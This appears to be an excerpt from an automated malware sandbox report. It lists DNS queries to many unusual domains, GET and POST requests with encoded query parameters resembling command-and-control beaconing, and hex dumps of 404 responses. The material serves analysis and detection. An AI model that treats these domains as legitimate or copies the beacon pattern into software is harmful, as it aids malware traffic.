            Source: global trafficHTTP traffic detected: GET /ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.quixaclienti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.789bet1okvip.solutionsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /8c7z/?D0Pts04=syard6w4RGgVSvsj/+94Ua9P+14Y627l/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVIwI+KCZPvpwqIuyBIvsqSHtYdkfPbGRUiwx+Cm8V2ixEWZMlegI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.334es.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.411divorce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficDNS traffic detected: DNS query: www.yexz60.live
            Source: global trafficDNS traffic detected: DNS query: www.sodnavisystem.com
            Source: global trafficDNS traffic detected: DNS query: www.gymroom.online
            Source: global trafficDNS traffic detected: DNS query: www.hectmalt.xyz
            Source: global trafficDNS traffic detected: DNS query: www.atlpicsstudios.com
            Source: global trafficDNS traffic detected: DNS query: www.bearclaw.bot
            Source: global trafficDNS traffic detected: DNS query: www.noghteyab.com
            Source: global trafficDNS traffic detected: DNS query: www.mcpcrecycling.com
            Source: global trafficDNS traffic detected: DNS query: www.evoolihubs.shop
            Source: global trafficDNS traffic detected: DNS query: www.shaf-kupe-msk.store
            Source: global trafficDNS traffic detected: DNS query: www.quixaclienti.com
            Source: global trafficDNS traffic detected: DNS query: www.789bet1okvip.solutions
            Source: global trafficDNS traffic detected: DNS query: www.334es.com
            Source: global trafficDNS traffic detected: DNS query: www.411divorce.com
            Source: global trafficDNS traffic detected: DNS query: www.sgbet777.org
            Source: unknownHTTP traffic detected: POST /5mht/ HTTP/1.1Host: www.sodnavisystem.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.sodnavisystem.comConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 212Referer: http://www.sodnavisystem.com/5mht/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 44 30 50 74 73 30 34 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 46 78 42 41 57 65 54 66 64 66 44 79 2b 78 48 77 49 48 4f 45 36 36 62 65 36 2b 51 63 76 73 53 55 75 55 68 6f 32 56 46 64 5a 62 76 7a 43 66 4e 2f 53 4e 47 61 5a 46 31 4e 53 49 45 64 51 4d 42 41 35 34 4d 48 70 30 63 38 56 68 70 48 49 62 78 48 70 47 43 34 36 57 66 78 37 57 34 2b 62 33 52 79 44 33 74 39 68 46 75 44 4c 64 67 53 54 57 43 71 51 56 41 48 2f 64 6c 4c 6b 79 6b 49 4b 6b 34 61 58 31 65 74 37 79 50 49 6d 70 42 50 4d 41 67 73 77 6d 44 6e 72 7a 2b 44 71 4e 71 6f 43 30 6a 30 77 50 6d 7a 2b 2f 2b 4d 44 4b 69 31 75 54 61 33 58 44 35 6f 2b 66 4f 47 68 43 6e 78 64 61 4e 2f Data Ascii: D0Pts04=U2Ur9XKzU6CWFxBAWeTfdfDy+xHwIHOE66be6+QcvsSUuUho2VFdZbvzCfN/SNGaZF1NSIEdQMBA54MHp0c8VhpHIbxHpGC46Wfx7W4+b3RyD3t9hFuDLdgSTWCqQVAH/dlLkykIKk4aX1et7yPImpBPMAgswmDnrz+DqNqoC0j0wPmz+/+MDKi1uTa3XD5o+fOGhCnxdaN/
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Jul 2024 22:03:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 13 May 2024 05:45:59 GMTETag: W/"afe-6184f66651a97"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Jul 2024 22:03:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 13 May 2024 05:45:59 GMTETag: W/"afe-6184f66651a97"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Jul 2024 22:03:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 13 May 2024 05:45:59 GMTETag: W/"afe-6184f66651a97"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Jul 2024 22:03:14 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Mon, 13 May 2024 05:45:59 GMTETag: "afe-6184f66651a97"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 12 Jul 2024 22:03:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 12 Jul 2024 22:03:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 12 Jul 2024 22:03:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 12 Jul 2024 22:03:27 GMTContent-Type: text/htmlContent-Length: 150Connection: closeVary: Accept-EncodingVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:03:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 